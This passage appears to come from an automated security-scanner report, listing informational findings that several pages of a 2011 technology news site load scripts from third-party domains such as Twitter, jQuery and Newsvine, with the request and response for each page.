</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.357. http://technolog.msnbc.redacted/privacy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /privacy

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /privacy HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=285
Date: Sun, 30 Jan 2011 02:40:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 131452

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.358. http://technolog.msnbc.redacted/samsung

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /samsung

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /samsung HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:48:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 134310

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.359. http://technolog.msnbc.redacted/science

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /science

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /science HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:42:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 147533

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.360. http://technolog.msnbc.redacted/security

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /security

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /security HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:40:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 132562

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.361. http://technolog.msnbc.redacted/smart-phone

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /smart-phone

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /smart-phone HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:52:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 114498

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div id="vine-inlineCode__5764905" class="inlineCode photo_align_right" data-contentid="5764905"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.362. http://technolog.msnbc.redacted/social-media

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /social-media

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /social-media HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=299
Date: Sun, 30 Jan 2011 02:45:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 139937

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
